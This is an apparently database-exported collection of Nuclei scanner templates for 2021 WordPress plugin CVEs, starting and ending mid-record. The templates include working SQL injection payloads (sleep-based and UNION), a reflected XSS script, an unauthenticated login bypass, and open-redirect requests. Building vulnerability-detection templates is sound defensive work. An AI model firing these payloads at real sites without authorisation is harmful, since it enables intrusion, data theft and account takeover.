HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n 
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\"><\" HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022058dc77da6c8d24825cb047a3e8c3ebf81009329a2e76774ba7c0057029c91916022100e648680bb6ce6d636b0d7ec9f0cd812776cc4617bf039cc8bac7d00b1ae026d9:922c64590222798bb761d5b6d8e72950", "hash": "0bb89e0e8bf899c17562ac21ca279ff2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c7" }, "name": "CVE-2021-24554.yaml", "content": "id: CVE-2021-24554\n\ninfo:\n name: WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection\n author: theamanrawat\n severity: high\n description: |\n WordPress Paytm Donation plugin through 1.3.2 is susceptible to authenticated SQL injection. The plugin does not sanitize, validate, or escape the id GET parameter before using it in a SQL statement when deleting donations. 
An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.\n remediation: |\n Update to the latest version of the WordPress Paytm Donation plugin (version > 1.3.2) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/f2842ac8-76fa-4490-aa0c-5f2b07ecf2ad\n - https://wordpress.org/plugins/wp-paytm-pay/\n - https://codevigilant.com/disclosure/2021/wp-plugin-wp-paytm-pay/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24554\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-24554\n cwe-id: CWE-89\n epss-score: 0.20268\n epss-percentile: 0.95935\n cpe: cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: freelancetoindia\n product: paytm-pay\n framework: wordpress\n tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n @timeout: 10s\n GET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_2>=6'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"paytm-settings_page_wp_paytm_donation\")'\n condition: and\n# digest: 
490a0046304402206761ba0bbf5025dd6acebce6ae4c00348e7a0c42d2dabe4f89025ddf1f64856802200b643eb17601d207edb76a789e0506dab04b0d1e4d81a8cef2106f21c6234377:922c64590222798bb761d5b6d8e72950", "hash": "c6a72384bf2b2fcec1a8a034a5e05ae1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c8" }, "name": "CVE-2021-24627.yaml", "content": "id: CVE-2021-24627\n\ninfo:\n name: G Auto-Hyperlink <= 1.0.1 - SQL Injection\n author: theamanrawat\n severity: high\n description: |\n The G Auto-Hyperlink WordPress plugin through 1.0.1 does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection\n reference:\n - https://wordpress.org/plugins/g-auto-hyperlink/\n - https://wpscan.com/vulnerability/c04ea768-150f-41b8-b08c-78d1ae006bbb\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24627\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-24627\n cwe-id: CWE-89\n epss-score: 0.14515\n epss-percentile: 0.95609\n cpe: cpe:2.3:a:g_auto-hyperlink_project:g_auto-hyperlink:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: g_auto-hyperlink_project\n product: g_auto-hyperlink\n framework: wordpress\n publicwww-query: /wp-content/plugins/g-auto-hyperlink/\n tags: cve2021,cve,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project\nvariables:\n num: 999999999\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+I\n - |\n GET /wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Cmd5%28{{num}}%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n 
matchers:\n - type: word\n part: body_2\n words:\n - \"c8c605999f3d8352d7bb792cf3fdb25b\"\n - \"Keyword\"\n - \"g-auto-hyperlink-edit\"\n condition: and\n\n - type: word\n part: header_2\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100bdb4a94865f92c4bfb19042de1f21fae7eebca1adb86abff97ff76e2b8a8343002202507f1d079f5aad3bf0c38a5bed17afdc4c7d599611392cc29897c83b6be1425:922c64590222798bb761d5b6d8e72950", "hash": "4719bf45c54075c285536413e17bae37", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082c9" }, "name": "CVE-2021-24647.yaml", "content": "id: CVE-2021-24647\n\ninfo:\n name: Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login\n author: DhiyaneshDK\n severity: high\n description: |\n The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username\n impact: |\n An attacker can gain unauthorized access to the WordPress site and potentially compromise sensitive information.\n remediation: Fixed in version 3.7.1.6\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24647\n - https://github.com/RandomRobbieBF/CVE-2021-24647\n - https://wpscan.com/vulnerability/40d347b1-b86e-477d-b4c6-da105935ce37\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2021-24647\n cwe-id: CWE-287\n epss-score: 0.22598\n epss-percentile: 0.96397\n cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"true\"\n max-request: 3\n vendor: genetechsolutions\n product: pie_register\n framework: wordpress\n tags: cve,cve2021,unauth,pie-register,wpscan,wp-plugin,wordpress,wp,genetechsolutions\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\n 
Host: {{Hostname}}\n - |\n POST /login/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/profile.php HTTP/2\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_1, \"pieregister\")'\n - 'contains(body_3, \"Username\") && contains(body_3, \"email-description\")'\n condition: and\n# digest: 4a0a004730450220204302541a5adc4eb84fc50fb71121e7140fda5e325560f2bc6af782c3aca218022100ab9e70ee88a95d91743d26f6f03d095cacd2446df954554ebd5977cd1815c210:922c64590222798bb761d5b6d8e72950", "hash": "e8181e1d8af358a7e644d3a6b3b886ee", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ca" }, "name": "CVE-2021-24666.yaml", "content": "id: CVE-2021-24666\n\ninfo:\n name: WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social & Donations module, not activated by default, adds the REST route /services/contributor/(?P[\\d]+) and takes id and category parameters as arguments. 
Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: Fixed in version 3.5.6.\n reference:\n - https://wpscan.com/vulnerability/fb4d7988-60ff-4862-96a1-80b1866336fe\n - https://wordpress.org/plugins/podlove-podcasting-plugin-for-wordpress/\n - https://github.com/podlove/podlove-publisher/commit/aa8a343a2e2333b34a422f801adee09b020c6d76\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24666\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24666\n cwe-id: CWE-89\n epss-score: 0.28174\n epss-percentile: 0.96727\n cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: podlove\n product: podlove_podcast_publisher\n framework: wordpress\n tags: cve2021,cve,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,podlove\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '66a82937a7660b73b00d4f7cefee6c85'\n - '\"service_id\"'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022026044c3717272e2e8420ed333438950d1278ecd387d98be83b17a4e221c88061022100f29de45026c0ac79f866c24c10ac02390cb7b01c5b01472839be278f0b677522:922c64590222798bb761d5b6d8e72950", "hash": "1b042987d7f36dc2590dadf17e149454", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf3082cb" }, "name": "CVE-2021-24731.yaml", "content": "id: CVE-2021-24731\n\ninfo:\n name: Pie Register < 3.7.1.6 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in version 3.7.1.6\n reference:\n - https://wpscan.com/vulnerability/6bed00e4-b363-43b8-a392-d068d342151a\n - https://wordpress.org/plugins/pie-register/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24731\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24731\n cwe-id: CWE-89\n epss-score: 0.14786\n epss-percentile: 0.95651\n cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: genetechsolutions\n product: pie_register\n framework: wordpress\n tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /wp-json/pie/v1/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n user_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"application/json\")'\n - 'contains(body, \"User credentials are invalid.\")'\n condition: and\n# digest: 
4b0a00483046022100fce3161626802d300b9a7d01b3d0b39df2f76c16556c4cd0f1f0f331408796bf022100f4a95c3a1fee3e3a75c2105e41b3554e20ce5802440a244a4f7cab3280f3178f:922c64590222798bb761d5b6d8e72950", "hash": "90ea8fa00f6b0cadefd618d7573e7401", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082cc" }, "name": "CVE-2021-24746.yaml", "content": "id: CVE-2021-24746\n\ninfo:\n name: WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting\n author: Supras\n severity: medium\n description: WordPress plugin Sassy Social Share < 3.3.40 contains a reflected cross-site scripting vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update the WordPress Sassy Social Share Plugin to version 3.3.40 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/99f4fb32-e312-4059-adaf-f4cbaa92d4fa\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24746\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24746\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: heateor\n product: sassy_social_share\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/sassy-social-share\"\n tags: cve,cve2021,wordpress,wp-plugin,xss,wp,wpscan,heateor\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-json/wp/v2/posts\"\n - \"{{BaseURL}}/{{slug}}/?a"><script>alert(document.domain)</script>\"\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '?a\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 
200\n\n extractors:\n - type: regex\n name: slug\n group: 1\n regex:\n - '\"slug\":\"([_a-z-A-Z0-9]+)\",'\n internal: true\n part: body\n# digest: 4a0a0047304502200993a9a2953aa772460c25d771fb5bc7793c9f97df213694a924f140c82564c2022100ee73b7aa4e200224d68aa207881162ef141bd75466b4b8a9c7973eb4706c3839:922c64590222798bb761d5b6d8e72950", "hash": "69972a34d91f803b459ee92dfc784d0d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082cd" }, "name": "CVE-2021-24750.yaml", "content": "id: CVE-2021-24750\n\ninfo:\n name: WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection\n author: cckuakilong\n severity: high\n description: WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Update to the latest version of the WordPress Visitor Statistics (Real Time Traffic) plugin (version 4.8 or higher) to mitigate the SQL Injection vulnerability.\n reference:\n - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py\n - https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de\n - https://plugins.trac.wordpress.org/changeset/2622268\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24750\n - https://github.com/WhooAmii/POC_to_review\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-24750\n cwe-id: CWE-89\n epss-score: 0.02112\n epss-percentile: 0.8802\n cpe: cpe:2.3:a:wp_visitor_statistics_\\(real_time_traffic\\)_project:wp_visitor_statistics_\\(real_time_traffic\\):*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n 
vendor: wp_visitor_statistics_\\(real_time_traffic\\)_project\n product: wp_visitor_statistics_\\(real_time_traffic\\)\n framework: wordpress\n tags: cve2021,cve,authenticated,wpscan,sqli,wp,wordpress,wp-plugin,wp_visitor_statistics_\\(real_time_traffic\\)_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100dd8e2f1ed7e6ac787ddc76d145588e55c3e1af2729f0eb0f6652d1c52284da91022100d61e0a905aa5921060a0e2bc63fdba2790e30fdd1d29ed5d3763b2e491f9dda1:922c64590222798bb761d5b6d8e72950", "hash": "4b352ba8b5034de09a7d53722c0e156d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ce" }, "name": "CVE-2021-24762.yaml", "content": "id: CVE-2021-24762\n\ninfo:\n name: WordPress Perfect Survey <1.5.2 - SQL Injection\n author: cckuailong\n severity: critical\n description: |\n Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.\n remediation: |\n Update to the latest version of the WordPress Perfect Survey plugin (1.5.2) to mitigate the SQL Injection vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/50766\n - 
https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget\n - https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24762\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24762\n cwe-id: CWE-89\n epss-score: 0.33888\n epss-percentile: 0.96671\n cpe: cpe:2.3:a:getperfectsurvey:perfect_survey:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: getperfectsurvey\n product: perfect_survey\n framework: wordpress\n tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'duration>=7'\n\n - type: word\n part: header\n words:\n - \"wp-ps-session\"\n\n - type: status\n status:\n - 404\n# digest: 4b0a0048304602210088b2f8641efb17289d0c9fa1e0fc57697b83b89f2c710a54603d6e0536009441022100c2ca459924277032aeae17d881fd19c80a6e3501bb3ff5be948390480bec353d:922c64590222798bb761d5b6d8e72950", "hash": "3192401fa47b1221903217dbeba6e647", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082cf" }, "name": "CVE-2021-24791.yaml", "content": "id: CVE-2021-24791\n\ninfo:\n name: Header Footer Code Manager < 1.1.14 - Admin+ SQL Injection\n author: r3Y3r53\n severity: high\n description: |\n The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the \"orderby\" and \"order\" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections\n remediation: Fixed in version 1.1.14\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24791\n - https://wpscan.com/vulnerability/d55caa9b-d50f-4c13-bc69-dc475641735f\n - 
https://wordpress.org/plugins/header-footer-code-manager/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-24791\n cwe-id: CWE-89\n epss-score: 0.10363\n epss-percentile: 0.94849\n cpe: cpe:2.3:a:draftpress:header_footer_code_manager:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: draftpress\n product: header_footer_code_manager\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wp-custom-pages/\"\n tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n @timeout: 20s\n GET /wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%286%29%29%29uWCv%29&order=DESC HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2,\"Add New Snippet\")'\n condition: and\n# digest: 4a0a0047304502210095714900b273532b79c9b68b4b7daad27ed4f8b54d5e90deef7d4e7820dc084702206369f1b610cf19a0d46bf27a00db0246bcaf269e93d481a69a1d44812064a241:922c64590222798bb761d5b6d8e72950", "hash": "366eb059927bf21c654eb4d83dbcc022", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d0" }, "name": "CVE-2021-24827.yaml", "content": "id: CVE-2021-24827\n\ninfo:\n name: WordPress Asgaros Forum <1.15.13 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. 
An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.\n remediation: |\n Upgrade to the latest version of Asgaros Forum (1.15.13 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1\n - https://wordpress.org/plugins/asgaros-forum/\n - https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24827\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24827\n cwe-id: CWE-89\n epss-score: 0.11843\n epss-percentile: 0.94798\n cpe: cpe:2.3:a:asgaros:asgaros_forum:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: asgaros\n product: asgaros_forum\n framework: wordpress\n tags: cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"asgarosforum\")'\n condition: and\n# digest: 4a0a0047304502204abd65cd69b3643e17793039bcb1df79c03f29ed1e031e0ae09f57d30b48a2eb022100cb2c0863ead3cbed3b58da963a5fe5581155c01b4aebcc1a1bbfc5404a1a6a3b:922c64590222798bb761d5b6d8e72950", "hash": "c21ac89e7b221fb72880415bb116eb3e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d1" }, "name": "CVE-2021-24838.yaml", "content": "id: CVE-2021-24838\n\ninfo:\n name: WordPress AnyComment <0.3.5 - Open Redirect\n author: noobexploiter\n severity: medium\n description: |\n 
WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the execution of other malicious activities.\n remediation: |\n Update to the latest version of WordPress AnyComment plugin (0.3.5 or higher) to fix the open redirect vulnerability.\n reference:\n - https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24838\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24838\n cwe-id: CWE-601\n epss-score: 0.00106\n epss-percentile: 0.42838\n cpe: cpe:2.3:a:bologer:anycomment:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: bologer\n product: anycomment\n framework: wordpress\n tags: cve2021,cve,redirect,anycomment,wpscan,wordpress,wp-plugin,bologer\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh\"\n - \"{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n\n - type: status\n status:\n - 302\n# digest: 4b0a00483046022100b49cb02f5e7f2e64f2ca2e050d6d61f31f4b28f27b4d952e4c4f44d672f31fc0022100ca970f8df5900aaa1bb963b0f20c63b05d6bb52089ee35b266d0c44cc1a9ed46:922c64590222798bb761d5b6d8e72950", "hash": 
"fc8633bc60980aeef2c620e4e41837bc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d2" }, "name": "CVE-2021-24849.yaml", "content": "id: CVE-2021-24849\n\ninfo:\n name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection\n author: ritikchaddha\n severity: critical\n description: |\n The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.\n remediation: Fixed in 3.4.12\n reference:\n - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24849\n - https://wordpress.org/plugins/wc-multivendor-marketplace/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24849\n cwe-id: CWE-89\n epss-score: 0.02367\n epss-percentile: 0.89583\n cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: wclovers\n product: \"frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible\"\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/wc-multivendor-marketplace\"\n tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code == 200\n - contains(body, \"WCFM Marketplace - Best Multivendor Marketplace for WooCommerce\")\n condition: and\n internal: true\n\n - raw:\n - |\n @timeout: 20s\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n {{post_data}}\n\n payloads:\n 
